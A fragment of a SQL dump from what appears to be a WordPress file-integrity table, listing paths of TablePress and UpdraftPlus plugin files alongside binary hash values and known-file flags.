:}Q','wp-content/plugins/tablepress/i18n/datatables/lang-ar.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uYBtpC>F','އ*\'v=TokYѲ p`ɮ%','',0,'?'),('G!|yq\ro','wp-content/plugins/tablepress/i18n/datatables/lang-az.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w7]\0uE,F9','\0rd*m&u_\n#G칹LH','',0,'?'),('#T;`4','wp-content/plugins/tablepress/i18n/datatables/lang-bel.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\r|@@A_իp','CL \r;GeWmld6U\\','',0,'?'),(']׹S5Cf','wp-content/plugins/tablepress/i18n/datatables/lang-bg_BG.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BkVDP }|','x.R .X>%aOAa','',0,'?'),('.,?<WP&8A','wp-content/plugins/tablepress/i18n/datatables/lang-cs_CZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3&>uG&','rM*V۸B̋ײ\0|Ѵ%$','',0,'?'),('exL]>','wp-content/plugins/tablepress/i18n/datatables/lang-da_DK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}=','ߠIA(	r,6xHR~g','',0,'?'),('?Y\\{@:\r','wp-content/plugins/tablepress/i18n/datatables/lang-de_AT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Bd,5\\]e','}+E]!!p:s<\nKiiFѻkI','',0,'?'),('!F\\Sv>9 W1Y','wp-content/plugins/tablepress/i18n/datatables/lang-de_CH.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gj~DQ',']e=r!wLj77OP','',0,'?'),('ϞrnI9r','wp-content/plugins/tablepress/i18n/datatables/lang-de_CH_informal.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Bd,5\\]e','}+E]!!p:s<\nKiiFѻkI','',0,'?'),('}y+NM_','wp-content/plugins/tablepress/i18n/datatables/lang-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Bd,5\\]e','}+E]!!p:s<\nKiiFѻkI','',0,'?'),('|4l?J','wp-content/plugins/tablepress/i18n/datatables/lang-de_DE_formal.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gj~DQ',']e=r!wLj77OP','',0,'?'),('Їl`1B=','wp-content/plugins/tablepress/i18n/datatables/lang-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ovo','hių8Y4f֦E`њs9^','',0,'?'),('0@G\rDVsj','wp-content/plugins/tablepress/i18n/datatables/lang-en_US.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eq\r53l\"j*kTS','U\'KUPZ38=|pu%','',0,'?'),('e9G7Rz','wp-content/plugins/tablepress/i18n/datatables/lang-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^n+PT4','SB3Uv#RF%cԮ','',0,'?'),('fSFߤv ','wp-content/plugins/tablepress/i18n/datatables/lang-et.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p.?R|\r','nsGm4k*fdP?r','',0,'?'),('YǬ>LX*rm','wp-content/plugins/tablepress/i18n/datatables/lang-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6fT-޾LEۃ#','\nVb6IW`};W#1','',0,'?'),('%#\\,{Ji','wp-content/plugins/tablepress/i18n/datatables/lang-fi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6M?mpE\nGt','lp=3\ZB\"66٭P','',0,'?'),('N?#H%\\Z79','wp-content/plugins/tablepress/i18n/datatables/lang-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%؇iIzeF',';|I0Ȫ#uroN[bJ`pP%{s','',0,'?'),('4jobd}R3','wp-content/plugins/tablepress/i18n/datatables/lang-ga.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S*:åh','^9ndطn vg pBJFK ?','',0,'?'),('ԘHBv2\0B6','wp-content/plugins/tablepress/i18n/datatables/lang-he_IL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ko\Z\Zuٮgk','N$hMj>إ|n.','',0,'?'),('M+@6g\r+Cs)','wp-content/plugins/tablepress/i18n/datatables/lang-hi_IN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ݻ\0QAuor','= |`KsBVN%','',0,'?'),('q>\rƦl{w','wp-content/plugins/tablepress/i18n/datatables/lang-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVY?~q','\\#\\&P','',0,'?'),('i}Ȅ','wp-content/plugins/tablepress/i18n/datatables/lang-hu_HU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i?1','[見S\\@/R W]O\niӜ\"r+9l','',0,'?'),('Z\"ʖ	D7,n','wp-content/plugins/tablepress/i18n/datatables/lang-id_ID.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+oo-l58','ui4GP71<:ˇEpɗ','',0,'?'),('1ݝI#4vP','wp-content/plugins/tablepress/i18n/datatables/lang-is_IS.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_|=~c&','1BVLC3ytdvNM}','',0,'?'),('}oqjqJg0','wp-content/plugins/tablepress/i18n/datatables/lang-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>9xwe:','2XuuV0BV]@\08','',0,'?'),('iCL','wp-content/plugins/tablepress/i18n/datatables/lang-ja.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aLf%ǩtZUj','zKJ= 횉0A1rF=','',0,'?'),('G1\'bm','wp-content/plugins/tablepress/i18n/datatables/lang-ko_KR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\\:_E','MrYr8pBkdGݧmD\n0c8','',0,'?'),('!7:,amO+fP','wp-content/plugins/tablepress/i18n/datatables/lang-lt_LT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ň@A{','m?Je8Js+@\"tM,k_#o','',0,'?'),('%K|Cc{','wp-content/plugins/tablepress/i18n/datatables/lang-lv.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S澿','j6JFc<_Q{?=03','',0,'?'),('^b4;kI','wp-content/plugins/tablepress/i18n/datatables/lang-mk_MK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	;fDd',';9Fmu&[D;xpF}','',0,'?'),('8DnD>','wp-content/plugins/tablepress/i18n/datatables/lang-nb_NO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0~n','Ǔ֓QAo-n_Ԉϝ','',0,'?'),('q|`Dab(','wp-content/plugins/tablepress/i18n/datatables/lang-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؤrhҤliíI','9b%`| O*Do@f','',0,'?'),(' MW@\"=Z\n3','wp-content/plugins/tablepress/i18n/datatables/lang-nn_NO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0~n','Ǔ֓QAo-n_Ԉϝ','',0,'?'),('^!~[O ','wp-content/plugins/tablepress/i18n/datatables/lang-pl_PL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')vl7؈','JO]fu#l@9!FbNXAt','',0,'?'),('|\Z!0A}~','wp-content/plugins/tablepress/i18n/datatables/lang-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l*ޕbGp]','<#}BR}jY Z<k','',0,'?'),('t\rOA*ޖ2ߧ','wp-content/plugins/tablepress/i18n/datatables/lang-pt_PT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SMc\nFƝG',']Vo\\Nܷ','',0,'?'),('n1Vw','wp-content/plugins/tablepress/i18n/datatables/lang-ro_RO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9*a#;Q','¬3\\МMpyv@ȘYAU\Z','',0,'?'),('+0b{%/','wp-content/plugins/tablepress/i18n/datatables/lang-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}efG0br^26|','\'RC,9n`>Mpou?9rk','',0,'?'),('{t\rd)c?ۅǟ','wp-content/plugins/tablepress/i18n/datatables/lang-sk_SK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=( H;','37I\'=w[Nxꐻ<K','',0,'?'),('rf:*g{_ ','wp-content/plugins/tablepress/i18n/datatables/lang-sl_SI.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iL<@;,','k֠*\'_>3gb5FmF\rbj3Pc','',0,'?'),('1%O%ZCY','wp-content/plugins/tablepress/i18n/datatables/lang-sq.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' y3uww=','ZɈ\'D0[53ԡ;톌,\n*','',0,'?'),('hvu\ni','wp-content/plugins/tablepress/i18n/datatables/lang-sr_RS.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':K	/6p޻X','7_荰gRh( (	MXЉ\"','',0,'?'),('~\\eu#!`','wp-content/plugins/tablepress/i18n/datatables/lang-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d멻L&H4','Z.o2*=͝=kP-','',0,'?'),('`Et[1y','wp-content/plugins/tablepress/i18n/datatables/lang-th.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\'l','=A|891B>BP}3cX\Z\"1','',0,'?'),('Dg`X̀:#u:03~','wp-content/plugins/tablepress/i18n/datatables/lang-tr_TR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I«k^cA','9BUW2\"ҀY','',0,'?'),('(xŏ9fGĖ.','wp-content/plugins/tablepress/i18n/datatables/lang-uk.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u^fE5&sXjL','eqYcMIuso`D]','',0,'?'),('=p`MsқF','wp-content/plugins/tablepress/i18n/datatables/lang-vi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ם}l\"\\\'Tӯ','$\nŻ4bniJ8wSoG','',0,'?'),('}wd$\Z=l','wp-content/plugins/tablepress/i18n/datatables/lang-zh_CN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZXGF$7Ն','V)yL%U1q[<	?j','',0,'?'),('Rqۡ','wp-content/plugins/tablepress/i18n/datatables/lang-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k<EskQ','B\0Hs]}cS	e\Z','',0,'?'),('\\0=+Z[nfN;d','wp-content/plugins/tablepress/i18n/datatables/warning.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MZEcKq)66','*_;G@<7Ӏ;u멜f','',0,'?'),('?t2NKR%','wp-content/plugins/tablepress/i18n/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),(':W[ﵧ\"4+','wp-content/plugins/tablepress/i18n/translating-tablepress.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WFPLʚ','׉Rh\"86TFe','',0,'?'),('#hvwVY$ ','wp-content/plugins/tablepress/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('n]?qzYy','wp-content/plugins/tablepress/js/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('\"y)J\\Mk+0','wp-content/plugins/tablepress/js/jquery.datatables.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v=zI9mO','Hsv}~ppgQ 3&','',0,'?'),('XAi	Rx\r','wp-content/plugins/tablepress/libraries/csstidy/class.csstidy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\'Gȣ{	q','oqxKdfNHؼ:٫','',0,'?'),('BsS','wp-content/plugins/tablepress/libraries/csstidy/class.csstidy_optimise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ER\'mj`\'p','Z:E]F+[}鑭c*<','',0,'?'),('O;Ul','wp-content/plugins/tablepress/libraries/csstidy/class.csstidy_print.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\!C=','q:Џ,G/S\n/@ͥzMfTmx','',0,'?'),('\nIˎ4Js2#o','wp-content/plugins/tablepress/libraries/csstidy/data-tp.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!0[','YOpyJk_/\"Yg','',0,'?'),('ȋ=ЦLbQ','wp-content/plugins/tablepress/libraries/csstidy/data.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0[L?֖O','H~]$1|g*1P7AbXBp6c:','',0,'?'),('ЄS겎+н','wp-content/plugins/tablepress/libraries/csstidy/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),(' {^5','wp-content/plugins/tablepress/libraries/csstidy/tablepress-standard.tpl',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.fo.Bg{No','/r}\'\rʀ|`\'-ܐ','',0,'?'),('`/\Z;]$[\0','wp-content/plugins/tablepress/libraries/csv-parser.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Ix^Nrq&','&\"yx};6MOaF\ZH5W7','',0,'?'),('ZM\0)՚j	4','wp-content/plugins/tablepress/libraries/evalmath.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bjt-Fb','ds9#np,+e,X\\8.','',0,'?'),('\"1{RD)b','wp-content/plugins/tablepress/libraries/excel-reader.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&zW2(Un','ž[tnzu2[f','',0,'?'),('.\Z\n΅6XPh+}','wp-content/plugins/tablepress/libraries/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('lJIQF','wp-content/plugins/tablepress/libraries/simplexlsx.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')gTX\n.','#*\'+hUW7&1mrub6*oWP','',0,'?'),('T!7','wp-content/plugins/tablepress/models/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('\nA6\rM	,','wp-content/plugins/tablepress/models/model-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ti6Rlȉ~9','K!`+r[aEZ`;#n','',0,'?'),('	gK?ŪbS','wp-content/plugins/tablepress/models/model-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+V\nfJf_','0|1u<(P2X-0','',0,'?'),('?ľpQ<<r;','wp-content/plugins/tablepress/models/model-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/2nA)','-3KoaW%T*Fܞ|u+^','',0,'?'),('\rm)uU5','wp-content/plugins/tablepress/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a6\r@-y	RS','C(tutx!ͬ3)','',0,'?'),('i~7s9M','wp-content/plugins/tablepress/tablepress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\_zriSł	{','f\0>~ʹj,hB','',0,'?'),('7Dqk0g8&$׶','wp-content/plugins/tablepress/views/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('|a$','wp-content/plugins/tablepress/views/view-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9E/Zg}','(hN`B`x>$ސW95AB\0','',0,'?'),('~#d,ݍ','wp-content/plugins/tablepress/views/view-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$H^ukl-Y','Fk1eQ?gōSsjK0,l','',0,'?'),('%f\'XճΗ','wp-content/plugins/tablepress/views/view-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-4Kk=Z΄7','?#f}','',0,'?'),('@Uv\"ϙ5L','wp-content/plugins/tablepress/views/view-editor_button_thickbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! B','7\0mM,n\Z?!NΚ4}C@˚	U','',0,'?'),('>o뒐qو-','wp-content/plugins/tablepress/views/view-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R`9[\0>*{','D(`׏Q՗cS>\n','',0,'?'),('3ӎtc=A5y\n','wp-content/plugins/tablepress/views/view-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y^^܉Oٜls','Uf}{Xq5Z`҃`3`h','',0,'?'),('TQהY\nrC','wp-content/plugins/tablepress/views/view-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YR/pUZ','Kƶ)	}5$\"4iBW','',0,'?'),('2\0\0[CGQ','wp-content/plugins/tablepress/views/view-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5;/B]pۺy','Z;u?^YLViBo	[&Q','',0,'?'),('P7\"VRS\0&e','wp-content/plugins/tablepress/views/view-options_custom_css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UT=ԃ^','C5r<\'\0]¶r𹎓J','',0,'?'),('A+[L104F','wp-content/plugins/tablepress/views/view-preview_table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B.tYfsMѭT','x+c+>b[X,L/<','',0,'?'),('\ZRn','wp-content/plugins/type.htaccess.php',0,'ُ\0	B~','ُ\0	B~','Bșo$\'AdLxRU','',0,'?'),('%hBAA~)t','wp-content/plugins/updraftplus/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Iml0T_Fr','D?GR6ʹj}teW0<\r~4Z{f','',0,'?'),('_IxF','wp-content/plugins/updraftplus/backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[>GV:tdg','c_iUEwNst\\@oD','',0,'?'),('W>i=k+','wp-content/plugins/updraftplus/central/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DPa\rtAxx',']SB`z>M׮+-~%8 +)Td','',0,'?'),('lꌘb;W4R','wp-content/plugins/updraftplus/central/classes/automatic-upgrader-skin-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɼUŬ)@',';BYB`z\'i	hIv}jG','',0,'?'),('_)q!|cH','wp-content/plugins/updraftplus/central/classes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\r<7DJ,Z','უNW0spZAV1[hq^','',0,'?'),('`Hpֈn\'!г','wp-content/plugins/updraftplus/central/commands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j/v9=+M','[q|͑ŶJoU~8HA>Mr,!','',0,'?'),('Ṩ\n-Mu/$Al','wp-content/plugins/updraftplus/central/listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W/71?J','W{R{<1aVh7SIck,G','',0,'?'),('`(5w!O','wp-content/plugins/updraftplus/central/modules/analytics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\'x3q','Lj64E42dp\Z{쯂','',0,'?'),('rN+ĩ#3W','wp-content/plugins/updraftplus/central/modules/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','US\r1Ff',':+u[i@$','',0,'?'),('gm P	Yޞ\r','wp-content/plugins/updraftplus/central/modules/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L(q(\02yyv','Z#@.;xnRt׷Ii3bk','',0,'?'),('a{3=a','wp-content/plugins/updraftplus/central/modules/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x1G׏R','pO]!Kh^NeCGԕJ[*fI-','',0,'?'),('~ZdS3\rR','wp-content/plugins/updraftplus/central/modules/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','otƫHk濁','_n#مO6\Zxf~?\'','',0,'?'),('<p0rRJ','wp-content/plugins/updraftplus/central/modules/posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yp:f e*+\n','RmH4=Fy3/t̹','',0,'?'),('#IyZ%tl:\0F','wp-content/plugins/updraftplus/central/modules/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ad=K','p(6-z>F+Mޠ,}q#','',0,'?'),(',\"\\$-h?y@\\','wp-content/plugins/updraftplus/central/modules/updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';n!I@{2','`1SR!S}XRF','',0,'?'),('6ōxU','wp-content/plugins/updraftplus/central/modules/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wv\'H:jP','Ex$m${u&$;f','',0,'?'),('ʆ\n>P7\"','wp-content/plugins/updraftplus/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dj\'uЕ','qsĺ,s\Z4nJzaM2+lVZpzB','',0,'?'),('h}Mv1\ZQlO','wp-content/plugins/updraftplus/class-updraftplus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']yv؏+ߊ','%74ю	?)\'5$G:w','',0,'?'),('t& #ıwJ','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows-fix.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=$(d#f','Rxʛk\ZoR&Ċ\0Pr)u#','',0,'?'),('6<c)!c','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows-fix.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7bK-Uvk','IfWVBA	\0zZ:K','',0,'?'),('d4ِJtP5	nh','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows-plain-buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|,>.˞P@','`#pUfH@eam/KE7B3ł','',0,'?'),('䀹SL_+p9','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows-plain-buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x24S[Cq','O]DHvN>u޾_7','',0,'?'),('%H[ѥ|׊','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yLZX\Z','ٲBv,42b-2	>+{P;Y','',0,'?'),('ьp#o\04\0','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-arrows.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sr3%2\Z%','rU*sp\n$(bGPd','',0,'?'),('W62','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Yi9Xp','9u5ʮd^3,F5Z뼳=','',0,'?'),('Pdק!\0','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-dark.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R%[)tlU?/','r>KhH@XU7o+<BKIS','',0,'?'),('bM^','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՂNڃ$','G!Ƕ[\"pbaQ','',0,'?'),(';\Zͥ','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-default.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0zoYרEP|','@f{<qM`\'\"5?EZi}m-','',0,'?'),('Yߍ3Ac\r','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-square-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѫd!f7|','jZt@b\\$f+}7@','',0,'?'),('\\L6OAfW7l','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-square-dark.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','הLhRx','!2[^{W9wDi	?.E','',0,'?'),('u\\6@gI+H.','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-square.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0nXJKw',':vqR번ZZT#','',0,'?'),('A^򓱝P3k','wp-content/plugins/updraftplus/css/tether-shepherd/shepherd-theme-square.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"(!#_,','3W4EsWou0JW','',0,'?'),('ƧapHY','wp-content/plugins/updraftplus/css/updraftplus-admin-1-16-25.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"F?F','*@tWnhg\'{\n','',0,'?'),('c{n9&KNiG','wp-content/plugins/updraftplus/css/updraftplus-admin-1-16-25.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P[pi','nך\"\\`?&ML<Ŝ','',0,'?'),('j2#I','wp-content/plugins/updraftplus/css/updraftplus-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XÊ8StVu','K\r\"e]	/9G\n','',0,'?'),('1ss)>(','wp-content/plugins/updraftplus/css/updraftplus-notices-1-16-25.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JT7XH!\n8r',',#)\n4914Lbi[C)','',0,'?'),('[!0@pr|','wp-content/plugins/updraftplus/css/updraftplus-notices-1-16-25.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':=6%#','UnzjEm^Xub}5U','',0,'?'),('\\hRSC8','wp-content/plugins/updraftplus/css/updraftplus-notices.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s |f.~C','z8A!༂9ݫYG\Z ','',0,'?'),('aY@J!)','wp-content/plugins/updraftplus/css/updraftplus-tour-1-16-25.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qv]_nT`7','4ΞB\n!Mڇݕl ','',0,'?'),('v!]x;e\0EW','wp-content/plugins/updraftplus/css/updraftplus-tour-1-16-25.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ňv,6ƍ\n:','n9S8J$ғ\0M$B7x','',0,'?'),('ȭᎣJׯ\0','wp-content/plugins/updraftplus/css/updraftplus-tour.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SVm:S@UI[','p0dqI F\"ϰԺ\nw','',0,'?'),('E]Z','wp-content/plugins/updraftplus/css/updraftplus-tour.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','amٗB衙je','D텏#\\bqxų۽g/s','',0,'?'),('q,<wLG\"E','wp-content/plugins/updraftplus/example-decrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U8d#:#','iM,;-4)yͼj5w','',0,'?'),('^qg`oZ','wp-content/plugins/updraftplus/images/addons-images/all.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0PfΘ','}/WBQ1:~ x~ n $','',0,'?'),('6˧i\'9','wp-content/plugins/updraftplus/images/addons-images/autobackup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+tnjK','-gvA>Es]Jzt','',0,'?'),('<_(=^r','wp-content/plugins/updraftplus/images/addons-images/azure.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tYקe{SD','1vof8MRX>+*}	+r','',0,'?'),('^S','wp-content/plugins/updraftplus/images/addons-images/backblaze.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƫT2MВ','?LT0ޓ\nh+','',0,'?'),('[0{B&^','wp-content/plugins/updraftplus/images/addons-images/cloudfiles-enhanced.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ph@$Wv','Um\ZA.F+xn(A','',0,'?'),('\Z}̪-K\0H','wp-content/plugins/updraftplus/images/addons-images/dropbox-folders.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',JAx?F4(','(W1r	%sYV-x2y(ހ','',0,'?'),('GpF:','wp-content/plugins/updraftplus/images/addons-images/fixtime.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?P^б 8nQLm','|@ЌC-D?^ 1[?O<','',0,'?'),('C>hZ8N`ya','wp-content/plugins/updraftplus/images/addons-images/google-enhanced.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W~p㙲','EvH:pGʦT[9ӣ\"7w6','',0,'?'),('0H\\6{옙Z','wp-content/plugins/updraftplus/images/addons-images/googlecloud.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'cf{=E','yAZ82i^<ϝ{V\rE[!7U\\','',0,'?'),('Dpi.','wp-content/plugins/updraftplus/images/addons-images/importer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2upg{!	